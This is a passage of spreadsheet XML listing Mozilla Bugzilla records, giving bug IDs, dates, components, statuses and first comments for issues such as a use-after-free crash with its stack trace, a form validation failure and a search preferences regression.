      </c>
      <c r="L188" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M188" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N188" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P188" t="inlineStr"/>
      <c r="Q188" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R188" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S188" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T188" t="n">
        <v>1</v>
      </c>
      <c r="U188" t="n">
        <v>0</v>
      </c>
      <c r="V188" t="n">
        <v>5</v>
      </c>
      <c r="W188" t="inlineStr">
        <is>
          <t>Forgot to check the changing of an item's |label| attribute in the dom to
rebuild a menu. was bug 11829 in bugscape.
patch coming up</t>
        </is>
      </c>
      <c r="X188" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" t="n">
        <v>620951</v>
      </c>
      <c r="B189" t="inlineStr">
        <is>
          <t>2010-12-22 07:28:56 -0800</t>
        </is>
      </c>
      <c r="C189" t="inlineStr">
        <is>
          <t>Tags/topics widget is "required", can't submit document form in Fx4</t>
        </is>
      </c>
      <c r="D189" t="inlineStr">
        <is>
          <t>2011-01-04 14:18:30 -0800</t>
        </is>
      </c>
      <c r="E189" t="n">
        <v>1</v>
      </c>
      <c r="F189" t="n">
        <v>1</v>
      </c>
      <c r="G189" t="n">
        <v>5</v>
      </c>
      <c r="H189" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I189" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J189" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K189" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M189" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N189" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P189" t="inlineStr"/>
      <c r="Q189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R189" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S189" t="inlineStr">
        <is>
          <t>2.4.1</t>
        </is>
      </c>
      <c r="T189" t="n">
        <v>1</v>
      </c>
      <c r="U189" t="n">
        <v>0</v>
      </c>
      <c r="V189" t="n">
        <v>3</v>
      </c>
      <c r="W189" t="inlineStr">
        <is>
          <t>Created attachment 499287
validation fail
The topics widget is marked as required, so Firefox 4 won't let you actually submit the KB revision form, since it never has data in it.</t>
        </is>
      </c>
      <c r="X189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" t="n">
        <v>952695</v>
      </c>
      <c r="B190" t="inlineStr">
        <is>
          <t>2013-12-20 17:30:45 -0800</t>
        </is>
      </c>
      <c r="C190" t="inlineStr">
        <is>
          <t>[Download Manager] Download manager keeps trying to download webapp on every reboot.</t>
        </is>
      </c>
      <c r="D190" t="inlineStr">
        <is>
          <t>2014-04-26 13:11:01 -0700</t>
        </is>
      </c>
      <c r="E190" t="n">
        <v>1</v>
      </c>
      <c r="F190" t="n">
        <v>1</v>
      </c>
      <c r="G190" t="n">
        <v>6</v>
      </c>
      <c r="H190" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I190" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J190" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K190" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L190" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M190" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N190" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P190" t="inlineStr">
        <is>
          <t>[systemsfe][p=5]</t>
        </is>
      </c>
      <c r="Q190" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R190" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S190" t="inlineStr">
        <is>
          <t>1.4 S2 (28feb)</t>
        </is>
      </c>
      <c r="T190" t="n">
        <v>1</v>
      </c>
      <c r="U190" t="n">
        <v>0</v>
      </c>
      <c r="V190" t="n">
        <v>24</v>
      </c>
      <c r="W190" t="inlineStr">
        <is>
          <t>1. go to http://anitroubles.com/app.webapp?feature_profile=3ebdd4ff36b6.46.3 
2. delete the app after download
3. reboot the device
Expected: no notification after the device starts up again.
Actual: notification that the webapp is downloading after it starts up.
Gaia      67e8b2b0d150f87b4297bb2f1fbae3d4aca3e5a7
Gecko    
BuildID   20131010004040
Version   18.0
ro.build.version.incremental=eng.zxliu.20131010.001907
ro.build.date=Thu Oct 10 00:19:23 CST 2013
Buri</t>
        </is>
      </c>
      <c r="X190" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" t="n">
        <v>1113949</v>
      </c>
      <c r="B191" t="inlineStr">
        <is>
          <t>2014-12-19 20:25:51 -0800</t>
        </is>
      </c>
      <c r="C191" t="inlineStr">
        <is>
          <t>Stage MozillaBuild 1.11.0</t>
        </is>
      </c>
      <c r="D191" t="inlineStr">
        <is>
          <t>2015-04-08 06:25:37 -0700</t>
        </is>
      </c>
      <c r="E191" t="n">
        <v>1</v>
      </c>
      <c r="F191" t="n">
        <v>1</v>
      </c>
      <c r="G191" t="n">
        <v>5</v>
      </c>
      <c r="H191" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I191" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J191" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K191" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P191" t="inlineStr"/>
      <c r="Q191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R191" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T191" t="n">
        <v>1</v>
      </c>
      <c r="U191" t="n">
        <v>0</v>
      </c>
      <c r="V191" t="n">
        <v>3</v>
      </c>
      <c r="W191" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1045679 +++
We need to stage MozillaBuild 1.11.0. Note that this contains the fix for CVE-2014-9390 so any expediting this can get would be very much appreciated.
File: http://people.mozilla.org/~rvandermeulen/MozillaBuildSetup1.11.0.exe
$ sha1sum MozillaBuildSetup1.11.0.exe
0f12045aa41f94db2f8a89f071372c6cb36d87fd  MozillaBuildSetup1.11.0.exe
Target:
http://ftp.mozilla.org/pub/mozilla.org/mozilla/libraries/win32/MozillaBuildSetup-1.11.0.exe (also update the MozillaBuildSetup-Latest.exe symlink)
Sources are tagged.</t>
        </is>
      </c>
      <c r="X191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" t="n">
        <v>79731</v>
      </c>
      <c r="B192" t="inlineStr">
        <is>
          <t>2001-05-09 09:35:24 -0700</t>
        </is>
      </c>
      <c r="C192" t="inlineStr">
        <is>
          <t>mfcembed causes IPF in module WEBBRWSR.DLL</t>
        </is>
      </c>
      <c r="D192" t="inlineStr">
        <is>
          <t>2019-03-26 10:47:02 -0700</t>
        </is>
      </c>
      <c r="E192" t="n">
        <v>1</v>
      </c>
      <c r="F192" t="n">
        <v>1</v>
      </c>
      <c r="G192" t="n">
        <v>6</v>
      </c>
      <c r="H192" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I192" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J192" t="inlineStr">
        <is>
          <t>Embedding: APIs</t>
        </is>
      </c>
      <c r="K192" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L192" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M192" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N192" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P192" t="inlineStr"/>
      <c r="Q192" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R192" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S192" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T192" t="n">
        <v>1</v>
      </c>
      <c r="U192" t="n">
        <v>0</v>
      </c>
      <c r="V192" t="n">
        <v>29</v>
      </c>
      <c r="W192" t="inlineStr">
        <is>
          <t>latest mfcembed dated: 05-09-01
O/S: win98
System: Dell Latitude CPi 400MHz 128MB RAM
Steps:
1. Download latest embed-win32.zip and unzip file
2. Launch mfcembed.exe
Results:
Mfcembed caused invalid page fault in module webbrwsr.dll at 0167:60b034ed</t>
        </is>
      </c>
      <c r="X192" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" t="n">
        <v>831095</v>
      </c>
      <c r="B193" t="inlineStr">
        <is>
          <t>2013-01-15 16:55:50 -0800</t>
        </is>
      </c>
      <c r="C193" t="inlineStr">
        <is>
          <t>Use-After-Free crash @xul!nsImageLoadingContent::OnStopContainer</t>
        </is>
      </c>
      <c r="D193" t="inlineStr">
        <is>
          <t>2024-05-30 07:59:33 -0700</t>
        </is>
      </c>
      <c r="E193" t="n">
        <v>1</v>
      </c>
      <c r="F193" t="n">
        <v>1</v>
      </c>
      <c r="G193" t="n">
        <v>3</v>
      </c>
      <c r="H193" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I193" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J193" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K193" t="inlineStr">
        <is>
          <t>21 Branch</t>
        </is>
      </c>
      <c r="L193" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M193" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N193" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P193" t="inlineStr">
        <is>
          <t>[asan][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q193" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R193" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S193" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T193" t="n">
        <v>1</v>
      </c>
      <c r="U193" t="n">
        <v>0</v>
      </c>
      <c r="V193" t="n">
        <v>20</v>
      </c>
      <c r="W193" t="inlineStr">
        <is>
          <t>Created attachment 702600
testcase, crashes the browser
The attached testcase crashes when loaded in latest Firefox nightly. Crashes at random memory addresses.
Stack trace on windows (this was with the previous testcase which loaded a jpeg file instead of png from data uri):
xul!nsImageLoadingContent::OnStopContainer+0x37:
64fcc61e ff5128          call    dword ptr [ecx+28h]  ds:002b:00000029=????????
0:000:x86&gt; cdb: Reading initial command 'kp 16;q'
ChildEBP RetAddr  
0033cb58 64e6eac6 xul!nsImageLoadingContent::OnStopContainer(class imgIRequest * aRequest = 0x07dc8e00, class imgIContainer * aContainer = 0x0779a790)+0x37
0033cb6c 64e2229d xul!imgRequestProxy::OnStopContainer(class imgIContainer * image = 0x0779a790)+0x36
0033cbfc 64dfd62b xul!imgRequest::OnStopDecode(class imgIRequest * aRequest = 0x00000000, tag_nsresult aStatus = NS_OK (0n0), wchar_t * aStatusArg = 0x00000000 "")+0xad
0033cc24 6501fca4 xul!mozilla::image::Decoder::PostDecodeDone(void)+0x67
*** WARNING: Unable to verify checksum for C:\Program Files (x86)\Mozilla Firefox\gkmedias.dll
0033cc2c 66072e8f xul!mozilla::image::term_source(struct jpeg_decompress_struct * jd = 0x07d47438)+0x14
0033cc38 64f86b63 gkmedias!jpeg_finish_decompress(struct jpeg_decompress_struct * cinfo = 0x07d47438)+0x5a
0033ce74 64f5beaf xul!mozilla::image::nsJPEGDecoder::WriteInternal(char * aBuffer = 0x07df5008 "G???", unsigned int aCount = 0x18e)+0x359
0033ce90 64faf970 xul!mozilla::image::RasterImage::WriteToDecoder(char * aBuffer = 0x07df5008 "G???", unsigned int aCount = 0x18e)+0x41
0033ceac 64f6ff0b xul!mozilla::image::RasterImage::DecodeSomeData(unsigned int aMaxBytes = 0x1000)+0x37
0033ceec 64fbaa9b xul!mozilla::image::RasterImage::DecodeWorker::DecodeSomeOfImage(class mozilla::image::RasterImage * aImg = 0x0779a790, mozilla::image::RasterImage::DecodeWorker::DecodeType aDecodeType = DECODE_TYPE_NORMAL (0n0))+0xbc
0033cf28 64e91dbf xul!mozilla::image::RasterImage::DecodeWorker::Run(void)+0xb6
0033cf98 6503c86f xul!nsThread::ProcessNextEvent(bool mayWait = false, bool * result = 0x0033cfd4)+0x2cf
0033cfcc 6504ca2b xul!mozilla::ipc::MessagePump::Run(class base::MessagePump::Delegate * aDelegate = 0x00a42001)+0x5f
0033d004 6504c9d3 xul!MessageLoop::RunHandler(void)+0x21
0033d020 6502fc8f xul!MessageLoop::Run(void)+0x15
0033d02c 6504c953 xul!nsBaseAppShell::Run(void)+0x34
0033ef80 65076c9d xul!nsAppShell::Run(void)+0x4e
0033ef8c 64fbc83a xul!nsAppStartup::Run(void)+0x1e
0033f058 6501522d xul!XREMain::XRE_mainRun(void)+0x405
0033f074 65037bb4 xul!XREMain::XRE_main(int argc = 0n5, char ** argv = 0x00134660, struct nsXREAppData * aAppData = 0x00c332e0)+0xde
*** WARNING: Unable to verify checksum for firefox.exe
0033f18c 00c31742 xul!XRE_main(int argc = 0n5, char ** argv = 0x00134660, struct nsXREAppData * aAppData = 0x00c332e0, unsigned int aFlags = 0)+0x30
0033fc64 00c31a64 firefox!wmain(int argc = 0n5, wchar_t ** argv = 0x00132e90)+0x742
quit:</t>
        </is>
      </c>
      <c r="X193" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" t="n">
        <v>1019649</v>
      </c>
      <c r="B194" t="inlineStr">
        <is>
          <t>2014-06-03 07:45:21 -0700</t>
        </is>
      </c>
      <c r="C194" t="inlineStr">
        <is>
          <t>[community hub] Implement SUMO News/Community Meeting section</t>
        </is>
      </c>
      <c r="D194" t="inlineStr">
        <is>
          <t>2014-07-15 13:22:19 -0700</t>
        </is>
      </c>
      <c r="E194" t="n">
        <v>1</v>
      </c>
      <c r="F194" t="n">
        <v>1</v>
      </c>
      <c r="G194" t="n">
        <v>5</v>
      </c>
      <c r="H194" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I194" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J194" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K194" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N194" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P194" t="inlineStr">
        <is>
          <t>u=contributor c=communityhub p=2 s=2014.11</t>
        </is>
      </c>
      <c r="Q194" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R194" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S194" t="inlineStr">
        <is>
          <t>2014Q2</t>
        </is>
      </c>
      <c r="T194" t="n">
        <v>1</v>
      </c>
      <c r="U194" t="n">
        <v>0</v>
      </c>
      <c r="V194" t="n">
        <v>7</v>
      </c>
      <c r="W194" t="inlineStr">
        <is>
          <t>For now, this section is just going to be a special KB document that we render into the right spot. Kind of like we used to do for landing pages and stuff.</t>
        </is>
      </c>
      <c r="X194" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" t="n">
        <v>841965</v>
      </c>
      <c r="B195" t="inlineStr">
        <is>
          <t>2013-02-15 16:42:26 -0800</t>
        </is>
      </c>
      <c r="C195" t="inlineStr">
        <is>
          <t>Paying with credit card fails with error message "object object"</t>
        </is>
      </c>
      <c r="D195" t="inlineStr">
        <is>
          <t>2013-03-06 09:37:05 -0800</t>
        </is>
      </c>
      <c r="E195" t="n">
        <v>1</v>
      </c>
      <c r="F195" t="n">
        <v>1</v>
      </c>
      <c r="G195" t="n">
        <v>6</v>
      </c>
      <c r="H195" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I195" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J195" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K195" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L195" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M195" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N195" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P195" t="inlineStr">
        <is>
          <t>[eta 3/6]</t>
        </is>
      </c>
      <c r="Q195" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R195" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S195" t="inlineStr">
        <is>
          <t>2013-02-28</t>
        </is>
      </c>
      <c r="T195" t="n">
        <v>1</v>
      </c>
      <c r="U195" t="n">
        <v>0</v>
      </c>
      <c r="V195" t="n">
        <v>4</v>
      </c>
      <c r="W195" t="inlineStr">
        <is>
          <t>Created attachment 714676
screenshot
steps to reproduce:
1. Click on the purchase button for a paid app
2. Sign in using identity
3. Enter PIN
4. Choose to purchase the app with credit card
5. Enter valid credit card details and click Buy
observed behavior:
Purchase fails with error message "object object"</t>
        </is>
      </c>
      <c r="X195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" t="n">
        <v>1352505</v>
      </c>
      <c r="B196" t="inlineStr">
        <is>
          <t>2017-03-31 11:12:02 -0700</t>
        </is>
      </c>
      <c r="C196" t="inlineStr">
        <is>
          <t>Removing search engines from preferences disabled 'Restore defaults' button</t>
        </is>
      </c>
      <c r="D196" t="inlineStr">
        <is>
          <t>2017-04-03 07:05:49 -0700</t>
        </is>
      </c>
      <c r="E196" t="n">
        <v>1</v>
      </c>
      <c r="F196" t="n">
        <v>1</v>
      </c>
      <c r="G196" t="n">
        <v>2</v>
      </c>
      <c r="H196" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I196" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J196" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K196" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N196" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P196" t="inlineStr"/>
      <c r="Q196" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R196" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S196" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T196" t="n">
        <v>1</v>
      </c>
      <c r="U196" t="n">
        <v>0</v>
      </c>
      <c r="V196" t="n">
        <v>7</v>
      </c>
      <c r="W196" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1327953 +++
&gt;&gt;&gt;   My Info:   Win7_64, Nightly 49, 32bit, ID 20160526082509
STR_1:
1. Open about:preferences#search in a clear profile
2. Select the last search engine
3. Click button "Remove" 3 times to delete selected search engine
AR:  Button "Restore Default Search Engines" is disabled
ER:  The button should be enabled, because 3 default search engines were deleted.
This is a regression from bug 1335907, as it got lost in the merge.</t>
        </is>
      </c>
      <c r="X196" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" t="n">
        <v>69621</v>
      </c>
      <c r="B197" t="inlineStr">
        <is>
          <t>2001-02-20 21:00:20 -0800</t>
        </is>
      </c>
      <c r="C197" t="inlineStr">
        <is>
          <t>Keyword cache not updated on keyword rename/delete (remove the keyword cache)</t>
        </is>
      </c>
      <c r="D197" t="inlineStr">
        <is>
          <t>2017-11-27 06:41:08 -0800</t>
        </is>
      </c>
      <c r="E197" t="n">
        <v>1</v>
      </c>
      <c r="F197" t="n">
        <v>1</v>
      </c>
      <c r="G197" t="n">
        <v>4</v>
      </c>
      <c r="H197" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I197" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J197" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K197" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N197" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P197" t="inlineStr"/>
      <c r="Q197" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R197" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S197" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T197" t="n">
        <v>1</v>
      </c>
      <c r="U197" t="n">
        <v>1</v>
      </c>
      <c r="V197" t="n">
        <v>39</v>
      </c>
      <c r="W197" t="inlineStr">
        <is>
          <t>I noticed this morning this from mozilla.org sanitycheck.cgi:
Checking cached keywords 
Bug(s) found with incorrect keyword cache: 46700, 47682, 48303, 50670, 50810,
50875, 51067, 51316, 51574, 51748,
51768, 52134, 52141, 52451, 52457, 52527, 52528, 52530, 52558, 52654, 52887,
52971, 53085, 53087, 53482, 54327,
54328, 55091, 55502, 55667, 56114, 56218, 56379, 56568, 57676, 58951, 58954,
59122, 59480, 59613, 59928, 59964,
61830, 63764, 64139, 64151, 65076, 8388607 
At least the first one, probably most of these were due to a keyword rename.  It
turns out editkeywords.cgi does not update the version cache of bugs when it
renames a keyword.
As far as I can tell, show_bug doesn't use the version cache, so it's not
terrible, but I presume queries use it.
I'm still looking at the last, illegal bug number.</t>
        </is>
      </c>
      <c r="X197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" t="n">
        <v>1742421</v>
      </c>
      <c r="B198" t="inlineStr">
        <is>
          <t>2021-11-22 07:27:50 -0800</t>
        </is>
      </c>
      <c r="C198" t="inlineStr">
        <is>
          <t>Exit fullscreen after Window resizeBy() or resizeTo()</t>
        </is>
      </c>
      <c r="D198" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:22 -0700</t>
        </is>
      </c>
      <c r="E198" t="n">
        <v>1</v>
      </c>
      <c r="F198" t="n">
        <v>1</v>
      </c>
      <c r="G198" t="n">
        <v>3</v>
      </c>
      <c r="H198" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I198" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J198" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K198" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N198" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P198" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][post-critsmash-triage][adv-main98+][adv-esr91.7+]</t>
        </is>
      </c>
      <c r="Q198" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R198" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S198" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T198" t="n">
        <v>1</v>
      </c>
      <c r="U198" t="n">
        <v>0</v>
      </c>
      <c r="V198" t="n">
        <v>27</v>
      </c>
      <c r="W198" t="inlineStr">
        <is>
          <t>Split off from https://bugzilla.mozilla.org/show_bug.cgi?id=1740389#c7.</t>
        </is>
      </c>
      <c r="X198" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" t="n">
        <v>1001202</v>
      </c>
      <c r="B199" t="inlineStr">
        <is>
          <t>2014-04-24 16:19:16 -0700</t>
        </is>
      </c>
      <c r="C199" t="inlineStr">
        <is>
          <t>expose time tracking UI by default for users with can-edit privs</t>
        </is>
      </c>
      <c r="D199" t="inlineStr">
        <is>
          <t>2019-11-27 23:44:47 -0800</t>
        </is>
      </c>
      <c r="E199" t="n">
        <v>1</v>
      </c>
      <c r="F199" t="n">
        <v>1</v>
      </c>
      <c r="G199" t="n">
        <v>7</v>
      </c>
      <c r="H199" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I199" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J199" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K199" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P199" t="inlineStr">
        <is>
          <t>[october-2019-bmo-triage]</t>
        </is>
      </c>
      <c r="Q199" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T199" t="n">
        <v>1</v>
      </c>
      <c r="U199" t="n">
        <v>0</v>
      </c>
      <c r="V199" t="n">
        <v>16</v>
      </c>
      <c r="W199" t="inlineStr">
        <is>
          <t>We're duplicating this functionality with whiteboard flags right now, I think exposing it by default would be a better solution.</t>
        </is>
      </c>
      <c r="X199" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" t="n">
        <v>393832</v>
      </c>
      <c r="B200" t="inlineStr">
        <is>
          <t>2007-08-27 01:24:19 -0700</t>
        </is>
      </c>
      <c r="C200" t="inlineStr">
        <is>
          <t>svg circle with infinite radius causes hang</t>
        </is>
      </c>
      <c r="D200" t="inlineStr">
        <is>
          <t>2009-07-30 15:51:16 -0700</t>
        </is>
      </c>
      <c r="E200" t="n">
        <v>1</v>
      </c>
      <c r="F200" t="n">
        <v>1</v>
      </c>
      <c r="G200" t="n">
        <v>3</v>
      </c>
      <c r="H200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I200" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J200" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K200" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N200" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P200" t="inlineStr">
